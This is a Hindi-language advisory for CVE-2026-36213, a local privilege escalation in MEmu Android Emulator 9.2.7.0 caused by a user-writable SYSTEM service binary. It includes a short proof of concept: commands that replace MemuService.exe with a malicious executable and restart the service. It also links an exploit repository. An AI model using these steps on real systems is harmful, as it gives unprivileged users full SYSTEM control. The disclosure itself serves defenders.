
CVE-2026-36213 | MEmu Android Emulator 9.2.7.0 में असुरक्षित सेवा बाइनरी अनुमतियों के माध्यम से स्थानीय विशेषाधिकार वृद्धि | 9.3.2 में पैच किया गया
CVE-2026-36213 | MEmu Android Emulator 9.2.7.0 में असुरक्षित सेवा बाइनरी अनुमतियों के माध्यम से स्थानीय विशेषाधिकार वृद्धि | 9.3.2 में पैच किया गया
MEmu Android Emulator 9.2.7.0 में स्थानीय विशेषाधिकार वृद्धि (LPE) भेद्यता।
सेवा MEmuSVC NT AUTHORITY\SYSTEM के रूप में चलती है, जबकि इसकी बाइनरी किसी भी स्थानीय उपयोगकर्ता द्वारा लिखने योग्य है, जिससे पूर्ण सिस्टम समझौता संभव हो जाता है।
| फ़ील्ड | विवरण |
|---|---|
| CVE | CVE-2026-36213 |
| उत्पाद | MEmu Android Emulator (MicroVirt) |
| प्रभावित संस्करण | 9.2.7.0 और पुराने |
| हल किया गया संस्करण | 9.3.2 |
| CWE | CWE-732 / CWE-269 |
| CVSS v3.1 | 7.8 HIGH AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
| ATT&CK | T1574.010 |
MEmuService.exe असुरक्षित NTFS अनुमतियों के साथ SYSTEM-स्तर की Windows सेवा के रूप में स्थापित है:
icacls "C:\Program Files\Microvirt\MEmu\MemuService.exe"
BUILTIN\Users:(F) ← Any local user has Full Control
Everyone:(F) ← World-writable binar
:: चरण 1 - भेद्य अनुमतियाँ सत्यापित करें
icacls "C:\Program Files\Microvirt\MEmu\MemuService.exe"
:: चरण 2 - बाइनरी बदलें (निम्न-विशेषाधिकार उपयोगकर्ता के रूप में)
copy malicious.exe "C:\Program Files\Microvirt\MEmu\MemuService.exe" /Y
:: चरण 3 - सेवा पुनः प्रारंभ करें
sc stop MEmuSVC && sc start MEmuSVC
:: परिणाम: malicious.exe NT AUTHORITY\SYSTEM के रूप में चलता है
यहाँ उपलब्ध: https://github.com/sec-zone/Hijack-service-binaries
यह शोध जिम्मेदार प्रकटीकरण नीति के तहत शैक्षिक उद्देश्यों के लिए किया गया था।
लेखक इस जानकारी के किसी भी दुरुपयोग के लिए जिम्मेदार नहीं है।
नाम: Mohammad Hossein Ashofte Yazdi
लिंक्डइन: https://www.linkedin.com/in/seczone64
ट्विटर: @sec_zone64
ईमेल: [email protected]